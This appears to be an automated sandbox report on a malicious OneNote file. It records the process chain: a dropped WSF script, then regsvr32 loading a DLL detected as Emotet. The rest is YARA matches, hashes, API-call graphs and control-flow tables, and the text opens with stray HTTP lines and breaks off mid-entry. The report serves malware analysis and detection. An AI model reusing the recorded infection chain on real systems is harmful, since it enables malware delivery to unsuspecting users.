                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2023-03-20 10:42:42 UTC311INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:11:40:39
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\8846_0.one
                                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                                  File size:1676072 bytes
                                                                                                                                                                                                                  MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                  Start time:11:41:04
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                  File size:147456 bytes
                                                                                                                                                                                                                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.410172116.000000000594E000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                  Start time:11:41:12
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll
                                                                                                                                                                                                                  Imagebase:0x12d0000
                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                  Start time:11:41:12
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline: "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll"
                                                                                                                                                                                                                  Imagebase:0x7ff674be0000
                                                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.390164485.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                  Start time:11:41:14
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\APvqE\xukoZN.dll"
                                                                                                                                                                                                                  Imagebase:0x7ff674be0000
                                                                                                                                                                                                                  File size:24064 bytes
                                                                                                                                                                                                                  MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.886565395.0000000001220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.886899027.0000000001511000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                  Start time:11:41:17
                                                                                                                                                                                                                  Start date:20/03/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:/tsr
                                                                                                                                                                                                                  Imagebase:0xab0000
                                                                                                                                                                                                                  File size:157872 bytes
                                                                                                                                                                                                                  MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:8.5%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:8.9%
                                                                                                                                                                                                                    Signature Coverage:7.1%
                                                                                                                                                                                                                    Total number of Nodes:282
                                                                                                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                                                                                                    execution_graph 8532 6980cc 8533 6980f3 8532->8533 8534 6982ba 8533->8534 8536 6ae9e8 8533->8536 8539 698bc8 8536->8539 8538 6aeab4 8538->8533 8541 698c02 8539->8541 8540 698eb8 8540->8538 8541->8540 8542 698d6f Process32FirstW 8541->8542 8542->8541 8543 650000 8547 65015a 8543->8547 8544 6508eb 8545 65033f GetNativeSystemInfo 8545->8544 8546 650377 VirtualAlloc 8545->8546 8548 650395 VirtualAlloc 8546->8548 8552 6503aa 8546->8552 8547->8544 8547->8545 8548->8552 8549 650873 8549->8544 8550 6508c6 RtlAddFunctionTable 8549->8550 8550->8544 8551 65084b VirtualProtect 8551->8552 8552->8549 8552->8551 8553 180001138 8554 180001141 __scrt_release_startup_lock 8553->8554 8556 180001145 8554->8556 8557 1800063cc 8554->8557 8558 1800063ec 8557->8558 8587 180006403 8557->8587 8559 1800063f4 8558->8559 8560 18000640a 8558->8560 8618 1800086f4 8559->8618 8588 180009cd8 8560->8588 8572 180006481 8574 1800086f4 __free_lconv_num 11 API calls 8572->8574 8573 180006499 8575 1800061a4 47 API calls 8573->8575 8576 180006486 8574->8576 8580 1800064b5 8575->8580 8624 18000878c 8576->8624 8578 1800064bb 8579 18000878c __free_lconv_num 11 API calls 8578->8579 8579->8587 8580->8578 8581 1800064e7 8580->8581 8582 180006500 8580->8582 8583 18000878c __free_lconv_num 11 API calls 8581->8583 8585 18000878c __free_lconv_num 11 API calls 8582->8585 8584 1800064f0 8583->8584 8586 18000878c __free_lconv_num 11 API calls 8584->8586 8585->8578 8586->8587 8587->8556 8589 18000640f 8588->8589 8590 180009ce5 8588->8590 8594 1800093bc GetModuleFileNameW 8589->8594 8630 180007e8c 8590->8630 8595 180009401 GetLastError 8594->8595 8596 180009415 8594->8596 8988 180008668 8595->8988 8598 1800091fc 47 API calls 8596->8598 8600 180009443 8598->8600 8599 18000940e 8601 1800010b0 _log10_special 8 API calls 8599->8601 8605 180009454 8600->8605 8993 18000a5f0 8600->8993 8604 180006426 8601->8604 8606 1800061a4 8604->8606 8996 1800092a0 8605->8996 8608 1800061e2 8606->8608 8610 18000624e 8608->8610 9010 18000a088 8608->9010 8609 18000633f 8612 18000636c 8609->8612 8610->8609 8611 18000a088 47 API calls 8610->8611 8611->8610 8613 180006384 8612->8613 8617 1800063bc 8612->8617 8614 180008714 _invalid_parameter_noinfo 11 API calls 8613->8614 8613->8617 8615 1800063b2 8614->8615 8616 18000878c __free_lconv_num 11 API calls 8615->8616 8616->8617 8617->8572 8617->8573 8619 180007f30 __free_lconv_num 11 API calls 8618->8619 8620 1800063f9 8619->8620 8621 1800085b8 8620->8621 9014 180008450 8621->9014 8625 180008791 HeapFree 8624->8625 8626 1800087c0 8624->8626 8625->8626 8627 1800087ac GetLastError 8625->8627 8626->8587 8628 1800087b9 __free_lconv_num 8627->8628 8629 1800086f4 __free_lconv_num 9 API calls 8628->8629 8629->8626 8631 180007eb8 FlsSetValue 8630->8631 8632 180007e9d FlsGetValue 8630->8632 8634 180007eaa 8631->8634 8635 180007ec5 8631->8635 8633 180007eb2 8632->8633 8632->8634 8633->8631 8636 180007eb0 8634->8636 8685 180006e28 8634->8685 8673 180008714 8635->8673 8650 1800099b0 8636->8650 8641 180007ef2 FlsSetValue 8643 180007efe FlsSetValue 8641->8643 8644 180007f10 8641->8644 8642 180007ee2 FlsSetValue 8645 180007eeb 8642->8645 8643->8645 8680 180007b24 8644->8680 8647 18000878c __free_lconv_num 11 API calls 8645->8647 8647->8634 8813 180009c20 8650->8813 8652 1800099e5 8828 1800096b0 8652->8828 8655 180009a02 8655->8589 8657 180009a13 8658 180009a1b 8657->8658 8660 180009a2a 8657->8660 8659 18000878c __free_lconv_num 11 API calls 8658->8659 8659->8655 8660->8660 8842 180009d54 8660->8842 8663 180009b26 8664 1800086f4 __free_lconv_num 11 API calls 8663->8664 8666 180009b2b 8664->8666 8665 180009b81 8668 180009be8 8665->8668 8853 1800094e0 8665->8853 8669 18000878c __free_lconv_num 11 API calls 8666->8669 8667 180009b40 8667->8665 8670 18000878c __free_lconv_num 11 API calls 8667->8670 8672 18000878c __free_lconv_num 11 API calls 8668->8672 8669->8655 8670->8665 8672->8655 8678 180008725 _invalid_parameter_noinfo 8673->8678 8674 180008776 8677 1800086f4 __free_lconv_num 10 API calls 8674->8677 8675 18000875a RtlAllocateHeap 8676 180007ed4 8675->8676 8675->8678 8676->8641 8676->8642 8677->8676 8678->8674 8678->8675 8694 18000abf8 8678->8694 8703 1800079fc 8680->8703 8717 18000acb8 8685->8717 8697 18000ac38 8694->8697 8702 180008160 EnterCriticalSection 8697->8702 8715 180008160 EnterCriticalSection 8703->8715 8751 18000ac70 8717->8751 8756 180008160 EnterCriticalSection 8751->8756 8814 180009c43 8813->8814 8815 180009c4d 8814->8815 8868 180008160 EnterCriticalSection 8814->8868 8818 180009cbf 8815->8818 8821 180006e28 __CxxCallCatchBlock 47 API calls 8815->8821 8818->8652 8823 180009cd7 8821->8823 8822 180009d2a 8822->8652 8823->8822 8825 180007e8c 52 API calls 8823->8825 8826 180009d14 8825->8826 8827 1800099b0 67 API calls 8826->8827 8827->8822 8869 1800091fc 8828->8869 8831 1800096e2 8833 1800096f7 8831->8833 8834 1800096e7 GetACP 8831->8834 8832 1800096d0 GetOEMCP 8832->8833 8833->8655 8835 18000b4c4 8833->8835 8834->8833 8836 18000b50f 8835->8836 8840 18000b4d3 _invalid_parameter_noinfo 8835->8840 8837 1800086f4 __free_lconv_num 11 API calls 8836->8837 8839 18000b50d 8837->8839 8838 18000b4f6 HeapAlloc 8838->8839 8838->8840 8839->8657 8840->8836 8840->8838 8841 18000abf8 _invalid_parameter_noinfo 2 API calls 8840->8841 8841->8840 8843 1800096b0 49 API calls 8842->8843 8844 180009d81 8843->8844 8845 180009ed7 8844->8845 8847 180009dbe IsValidCodePage 8844->8847 8852 180009dd8 __CxxCallCatchBlock 8844->8852 8846 1800010b0 _log10_special 8 API calls 8845->8846 8848 180009b1d 8846->8848 8847->8845 8849 180009dcf 8847->8849 8848->8663 8848->8667 8850 180009dfe GetCPInfo 8849->8850 8849->8852 8850->8845 8850->8852 8901 1800097c8 8852->8901 8987 180008160 EnterCriticalSection 8853->8987 8870 180009220 8869->8870 8871 18000921b 8869->8871 8870->8871 8872 180007db8 __CxxCallCatchBlock 47 API calls 8870->8872 8871->8831 8871->8832 8873 18000923b 8872->8873 8877 18000b524 8873->8877 8878 18000b539 8877->8878 8879 18000925e 8877->8879 8878->8879 8885 18000bfb4 8878->8885 8881 18000b590 8879->8881 8882 18000b5a5 8881->8882 8883 18000b5b8 8881->8883 8882->8883 8898 180009d38 8882->8898 8883->8871 8886 180007db8 __CxxCallCatchBlock 47 API calls 8885->8886 8887 18000bfc3 8886->8887 8888 18000c00e 8887->8888 8897 180008160 EnterCriticalSection 8887->8897 8888->8879 8899 180007db8 __CxxCallCatchBlock 47 API calls 8898->8899 8900 180009d41 8899->8900 8902 180009805 GetCPInfo 8901->8902 8911 1800098fb 8901->8911 8908 180009818 8902->8908 8902->8911 8903 1800010b0 _log10_special 8 API calls 8904 18000999a 8903->8904 8904->8845 8912 18000caa4 8908->8912 8911->8903 8913 1800091fc 47 API calls 8912->8913 8914 18000cae6 8913->8914 8932 18000a0c4 8914->8932 8933 18000a0cd MultiByteToWideChar 8932->8933 8989 180007f30 __free_lconv_num 11 API calls 8988->8989 8990 180008675 __free_lconv_num 8989->8990 8991 180007f30 __free_lconv_num 11 API calls 8990->8991 8992 180008697 8991->8992 8992->8599 8994 18000a3dc 5 API calls 8993->8994 8995 18000a610 8994->8995 8995->8605 8997 1800092df 8996->8997 8998 1800092c4 8996->8998 8999 18000a154 WideCharToMultiByte 8997->8999 9004 1800092e4 8997->9004 8998->8599 9000 18000933b 8999->9000 9001 180009342 GetLastError 9000->9001 9000->9004 9005 18000936d 9000->9005 9003 180008668 11 API calls 9001->9003 9002 1800086f4 __free_lconv_num 11 API calls 9002->8998 9006 18000934f 9003->9006 9004->8998 9004->9002 9007 18000a154 WideCharToMultiByte 9005->9007 9008 1800086f4 __free_lconv_num 11 API calls 9006->9008 9009 180009394 9007->9009 9008->8998 9009->8998 9009->9001 9011 18000a014 9010->9011 9012 1800091fc 47 API calls 9011->9012 9013 18000a038 9012->9013 9013->8608 9015 18000847b 9014->9015 9022 1800084ec 9015->9022 9019 1800084da 9019->8587 9020 1800084c5 9020->9019 9021 180006ef0 _invalid_parameter_noinfo 47 API calls 9020->9021 9021->9019 9047 180008234 9022->9047 9027 1800084a2 9027->9020 9032 180006ef0 9027->9032 9033 180006f48 9032->9033 9034 180006eff GetLastError 9032->9034 9033->9020 9035 180006f14 9034->9035 9036 180007ff8 _invalid_parameter_noinfo 16 API calls 9035->9036 9037 180006f2e SetLastError 9036->9037 9037->9033 9038 180006f51 9037->9038 9039 180006e28 __CxxCallCatchBlock 45 API calls 9038->9039 9040 180006f56 9039->9040 9041 180006ef0 _invalid_parameter_noinfo 45 API calls 9040->9041 9042 180006f77 9041->9042 9077 18000b558 9042->9077 9048 18000828b 9047->9048 9049 180008250 GetLastError 9047->9049 9048->9027 9053 1800082a0 9048->9053 9050 180008260 9049->9050 9060 180007ff8 9050->9060 9054 1800082d4 9053->9054 9055 1800082bc GetLastError SetLastError 9053->9055 9054->9027 9056 1800085d8 IsProcessorFeaturePresent 9054->9056 9055->9054 9057 1800085eb 9056->9057 9058 1800082ec __CxxCallCatchBlock 14 API calls 9057->9058 9059 180008606 GetCurrentProcess TerminateProcess 9058->9059 9061 180008032 FlsSetValue 9060->9061 9062 180008017 FlsGetValue 9060->9062 9064 18000803f 9061->9064 9074 180008024 SetLastError 9061->9074 9063 18000802c 9062->9063 9062->9074 9063->9061 9065 180008714 _invalid_parameter_noinfo 11 API calls 9064->9065 9066 18000804e 9065->9066 9067 18000806c FlsSetValue 9066->9067 9068 18000805c FlsSetValue 9066->9068 9070 180008078 FlsSetValue 9067->9070 9071 18000808a 9067->9071 9069 180008065 9068->9069 9072 18000878c __free_lconv_num 11 API calls 9069->9072 9070->9069 9073 180007b24 _invalid_parameter_noinfo 11 API calls 9071->9073 9072->9074 9075 180008092 9073->9075 9074->9048 9076 18000878c __free_lconv_num 11 API calls 9075->9076 9076->9074 9078 18000b571 9077->9078 9079 180006f9f 9077->9079 9078->9079 9080 18000bfb4 _invalid_parameter_noinfo 47 API calls 9078->9080 9081 18000b5c4 9079->9081 9080->9079 9082 18000b5dd 9081->9082 9084 180006faf 9081->9084 9083 180009d38 _invalid_parameter_noinfo 47 API calls 9082->9083 9082->9084 9083->9084 9084->9020 9085 180010a8e ExitProcess 9088 180014c90 LoadStringW LoadStringW 9085->9088 9097 1800109d0 LoadCursorW RegisterClassExW 9088->9097 9090 180014cec 9098 180010910 CreateWindowExW 9090->9098 9092 180014d02 GetMessageW 9093 180010ab3 9092->9093 9094 180014d19 TranslateAcceleratorW 9092->9094 9095 180014cfa 9094->9095 9096 180014d2f TranslateMessage DispatchMessageW 9094->9096 9095->9092 9095->9093 9096->9095 9097->9090 9099 1800109a1 ShowWindow UpdateWindow 9098->9099 9100 18001099d 9098->9100 9099->9100 9100->9095 9101 694214 9102 694256 9101->9102 9105 6a3988 9102->9105 9104 6944c6 9107 6a3a29 9105->9107 9106 6a3acc CreateProcessW 9106->9104 9107->9106

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 650000-65029a call 65091c * 2 13 650905 0->13 14 6502a0-6502a4 0->14 15 650907-65091a 13->15 14->13 16 6502aa-6502ae 14->16 16->13 17 6502b4-6502b8 16->17 17->13 18 6502be-6502c5 17->18 18->13 19 6502cb-6502dc 18->19 19->13 20 6502e2-6502eb 19->20 20->13 21 6502f1-6502fc 20->21 21->13 22 650302-650312 21->22 23 650314-65031a 22->23 24 65033f-650371 GetNativeSystemInfo 22->24 25 65031c-650324 23->25 24->13 26 650377-650393 VirtualAlloc 24->26 27 650326-65032a 25->27 28 65032c-65032d 25->28 29 650395-6503a8 VirtualAlloc 26->29 30 6503aa-6503ae 26->30 31 65032f-65033d 27->31 28->31 29->30 32 6503b0-6503c2 30->32 33 6503dc-6503e3 30->33 31->24 31->25 36 6503d4-6503d8 32->36 34 6503e5-6503f9 33->34 35 6503fb-650417 33->35 34->34 34->35 37 650419-65041a 35->37 38 650458-650465 35->38 39 6503c4-6503d1 36->39 40 6503da 36->40 41 65041c-650422 37->41 42 650537-650542 38->42 43 65046b-650472 38->43 39->36 40->35 44 650424-650446 41->44 45 650448-650456 41->45 46 6506e6-6506ed 42->46 47 650548-650559 42->47 43->42 48 650478-650485 43->48 44->44 44->45 45->38 45->41 51 6506f3-650707 46->51 52 6507ac-6507c3 46->52 49 650562-650565 47->49 48->42 50 65048b-65048f 48->50 53 650567-650574 49->53 54 65055b-65055f 49->54 55 65051b-650525 50->55 56 65070d 51->56 57 6507a9-6507aa 51->57 58 6507c9-6507cd 52->58 59 65087a-65088d 52->59 62 65060d-650619 53->62 63 65057a-65057d 53->63 54->49 60 650494-6504a8 55->60 61 65052b-650531 55->61 64 650712-650736 56->64 57->52 65 6507d0-6507d3 58->65 83 6508b3-6508ba 59->83 84 65088f-65089a 59->84 70 6504cf-6504d3 60->70 71 6504aa-6504cd 60->71 61->42 61->50 68 6506e2-6506e3 62->68 69 65061f 62->69 63->62 72 650583-65059b 63->72 87 650796-65079f 64->87 88 650738-65073e 64->88 66 65085f-65086d 65->66 67 6507d9-6507e9 65->67 66->65 77 650873-650874 66->77 74 65080d-65080f 67->74 75 6507eb-6507ed 67->75 68->46 76 650625-650648 69->76 79 6504d5-6504e1 70->79 80 6504e3-6504e7 70->80 78 650518-650519 71->78 72->62 81 65059d-65059e 72->81 92 650811-650820 74->92 93 650822-65082b 74->93 90 6507ef-6507f9 75->90 91 6507fb-65080b 75->91 110 6506b2-6506b7 76->110 111 65064a-65064b 76->111 77->59 78->55 96 650511-650515 79->96 85 6504fe-650502 80->85 86 6504e9-6504fc 80->86 97 6505a0-650605 81->97 94 6508bc-6508c4 83->94 95 6508eb-650903 83->95 89 6508ab-6508b1 84->89 85->78 105 650504-65050e 85->105 86->96 87->64 104 6507a5-6507a6 87->104 99 650740-650746 88->99 100 650748-650754 88->100 89->83 101 65089c-6508a8 89->101 106 65082e-65083d 90->106 91->106 92->106 93->106 94->95 103 6508c6-6508e9 RtlAddFunctionTable 94->103 95->15 96->78 97->97 98 650607 97->98 98->62 107 65077b-65078d 99->107 108 650764-650776 100->108 109 650756-650757 100->109 101->89 103->95 104->57 105->96 112 65083f-650845 106->112 113 65084b-65085c VirtualProtect 106->113 107->87 125 65078f-650794 107->125 108->107 116 650759-650762 109->116 118 6506ce-6506d8 110->118 119 6506b9-6506bd 110->119 117 65064e-650651 111->117 112->113 113->66 116->108 116->116 122 650653-650659 117->122 123 65065b-650666 117->123 118->76 124 6506de-6506df 118->124 119->118 120 6506bf-6506c3 119->120 120->118 129 6506c5 120->129 126 65068d-6506a3 122->126 127 650676-650688 123->127 128 650668-650669 123->128 124->68 125->88 132 6506a5-6506aa 126->132 133 6506ac 126->133 127->126 130 65066b-650674 128->130 129->118 130->127 130->130 132->117 133->110
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390153478.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_650000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                                                                                                                                    • API String ID: 394283112-3605381585
                                                                                                                                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction ID: 88e2c43a2d3464b6482ec247e04d0e9f5eb844d2c8e351a5ea33fd2d63c78717
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC522630618B098BDB19DF18D8857BAB7F2FB54305F14462DE88BC7251DB34E94ACB86
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                                                                                                                                    • API String ID: 0-383957222
                                                                                                                                                                                                                    • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                                    • Instruction ID: 93b2aa76f6a4736591dd79fad5d572070da48b28ce0dd8a9ab6e1bed8a1b10ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33C1CC71519780AFD3C8DF28C58A91BBBF1FB94744F906A1DF89286260D7B4D949CF02
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                                    • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                                                                                                                                                    • API String ID: 2485490239-3005932707
                                                                                                                                                                                                                    • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                                    • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 260 697d6c-697d9a 261 697d9c-697da4 260->261 262 69804a-6980a9 call 6aa474 261->262 263 697daa-697dad 261->263 271 6980ab-6980b0 262->271 272 6980b5 262->272 265 697db3-697db9 263->265 266 697ff4-698045 call 6a6048 263->266 268 697dbf-697dc5 265->268 269 697f53-697fef call 6afdcc 265->269 266->261 273 697dcb-697ec1 call 6abb78 268->273 274 6980ba-6980c0 268->274 269->261 271->261 272->274 281 697ec6-697ecc 273->281 278 697f40-697f52 274->278 279 6980c6 274->279 279->261 282 697edf-697f3b call 6a8f30 281->282 283 697ece-697ed5 281->283 282->278 283->282
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_691000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                                                                                                                                                    • API String ID: 0-308291206
                                                                                                                                                                                                                    • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                                    • Instruction ID: 96ef114ba7fa0b761480790ad3d880e2fa086c0bf28fe8f721bf5f8dbd2e97b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E914A7150074A8BDF48DF28C88A4DE3FA1FB68358F65422CEC4AA6690D778D995CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 285 6aa000-6aa0cc call 6a9f38 call 6a2404 290 6aa22c-6aa243 285->290 291 6aa0d2-6aa16a call 6a9424 285->291 293 6aa16f-6aa227 call 6ac2c0 291->293 293->290
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00691000, based on PE: false
